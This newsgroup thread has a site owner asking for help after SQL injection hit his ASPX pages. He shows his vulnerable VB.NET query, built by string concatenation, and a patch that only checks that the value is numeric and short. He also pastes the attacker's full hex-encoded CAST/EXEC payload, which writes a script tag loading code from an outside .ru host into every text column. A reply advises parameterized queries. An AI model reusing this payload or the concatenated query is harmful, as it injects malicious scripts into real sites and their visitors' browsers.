sql injection problem

[Keith G Hicks]

I have a site that is made up of sevearl aspx pages. It was recently
attacked by sql injection. I downloaded the tool described here:
http://support.microsoft.com/kb/954476 but can't seem to run it correctly.
All the examples are for asp pages, not aspx pages. I tried to find a
similar tool for aspx with no luck. When I run the tool on one of my aspx
pages I get errors, not sql injection problems.

Here's an example from the readme.html file for the tool:

msscasi_asp.exe /input="c:\source\logon.asp" /output="warnings.xml"

Here's one of the warnigns I get:

** msscasi_asp: Parse warning at C:\Inetpub\wwwroot\MySite\logon.aspx (line
2, column 94): Ignoring unexpected settings directive. Settings directive
must be unique and must be placed at the beginning of the file.

And there's nothing in my output file. It looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<DEFECTS>
</DEFECTS>
<!--SEQ:0000000000-->

What do I do to run this on my aspx pages?

Can anyone help me out here? If I'm in the wrong newsgroup for this, please
tell me where I should post instead.

Thanks,

Keith

 

[Keith G Hicks]

By teh way, I took a look at the page where this happened and realized what
they did. Here's what I used to have:

Protected Sub Page_Load(ByVal sender As Object, ByVal e As
System.EventArgs) Handles Me.Load
If Not Page.IsPostBack Then
If Request.QueryString("ClassmateID") <> "" Then
dsClassmates.SelectCommand = "SELECT * FROM
[Reunion].[vwClassmates_Approved_ForSite] WHERE ClassmateID = " &
Request.QueryString("ClassmateID")
dsClassmates.DataBind()
End If
End If
End Sub


Here's what I chagned it to (the line that tests for IsNumeric is new):

Protected Sub Page_Load(ByVal sender As Object, ByVal e As
System.EventArgs) Handles Me.Load
If Not Page.IsPostBack Then
If Request.QueryString("ClassmateID") <> "" Then
If IsNumeric(Request.QueryString("ClassmateID")) And
(Len(Request.QueryString("ClassmateID").ToString) < 6) Then
dsClassmates.SelectCommand = "SELECT * FROM
[Reunion].[vwClassmates_Approved_ForSite] WHERE ClassmateID = " &
Request.QueryString("ClassmateID")
dsClassmates.DataBind()
End If
End If
End If
End Sub

I'm thinking that solves my problem in this spot. Does that make sense? This
is what the hacker did:

ClassmateID=616;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C4152452
04054205641524348415228323535292C404320564152434841522832353529204445434C415
245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616
D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E732
06220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442
028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D3
23331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204
645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404
3205748494C4528404046455443485F5354415455533D302920424547494E204558454328275
55044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5
645525428564152434841522834303030292C5B272B40432B275D29292B27273C73637269707
4207372633D687474703A2F2F7777772E706F72762E72752F6A732E6A733E3C2F73637269707
43E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E5
44F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4
3415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);

So it seems to me if I test for numeric and limit the lenght of the query
string I should be covered.

Any comments?
(still wondering about the MS injection analyzer too also)

Thanks,

Keith

 

[Lloyd Sheen]

By teh way, I took a look at the page where this happened and realized what
they did. Here's what I used to have:

Protected Sub Page_Load(ByVal sender As Object, ByVal e As
System.EventArgs) Handles Me.Load
If Not Page.IsPostBack Then
If Request.QueryString("ClassmateID") <> "" Then
dsClassmates.SelectCommand = "SELECT * FROM
[Reunion].[vwClassmates_Approved_ForSite] WHERE ClassmateID = " &
Request.QueryString("ClassmateID")
dsClassmates.DataBind()
End If
End If
End Sub


Here's what I chagned it to (the line that tests for IsNumeric is new):

Protected Sub Page_Load(ByVal sender As Object, ByVal e As
System.EventArgs) Handles Me.Load
If Not Page.IsPostBack Then
If Request.QueryString("ClassmateID") <> "" Then
If IsNumeric(Request.QueryString("ClassmateID")) And
(Len(Request.QueryString("ClassmateID").ToString) < 6) Then
dsClassmates.SelectCommand = "SELECT * FROM
[Reunion].[vwClassmates_Approved_ForSite] WHERE ClassmateID = " &
Request.QueryString("ClassmateID")
dsClassmates.DataBind()
End If
End If
End If
End Sub

I'm thinking that solves my problem in this spot. Does that make sense? This
is what the hacker did:

ClassmateID=616;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C4152452
04054205641524348415228323535292C404320564152434841522832353529204445434C415
245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616
D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E732
06220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442
028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D3
23331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204
645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404
3205748494C4528404046455443485F5354415455533D302920424547494E204558454328275
55044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5
645525428564152434841522834303030292C5B272B40432B275D29292B27273C73637269707
4207372633D687474703A2F2F7777772E706F72762E72752F6A732E6A733E3C2F73637269707
43E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E5
44F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4
3415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);

So it seems to me if I test for numeric and limit the lenght of the query
string I should be covered.

Any comments?
(still wondering about the MS injection analyzer too also)

Thanks,

Keith

I have a site that is made up of sevearl aspx pages. It was recently
attacked by sql injection. I downloaded the tool described here:
http://support.microsoft.com/kb/954476 but can't seem to run it correctly.
All the examples are for asp pages, not aspx pages. I tried to find a
similar tool for aspx with no luck. When I run the tool on one of my aspx
pages I get errors, not sql injection problems.

Here's an example from the readme.html file for the tool:

msscasi_asp.exe /input="c:\source\logon.asp" /output="warnings.xml"

Here's one of the warnigns I get:

** msscasi_asp: Parse warning at C:\Inetpub\wwwroot\MySite\logon.aspx (line
2, column 94): Ignoring unexpected settings directive. Settings directive
must be unique and must be placed at the beginning of the file.

And there's nothing in my output file. It looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<DEFECTS>
</DEFECTS>
<!--SEQ:0000000000-->

What do I do to run this on my aspx pages?

Can anyone help me out here? If I'm in the wrong newsgroup for this, please
tell me where I should post instead.

Thanks,

Keith

What you need to do is use SQLParameters to stop SQL injection. There
arer lots of articles on this (search Google). Basically what you would
do is have your where statment something like WHERE ClassmateID =
@ClassmateID. Then create a SqlParameter which would get populated from
the QueryString.

LS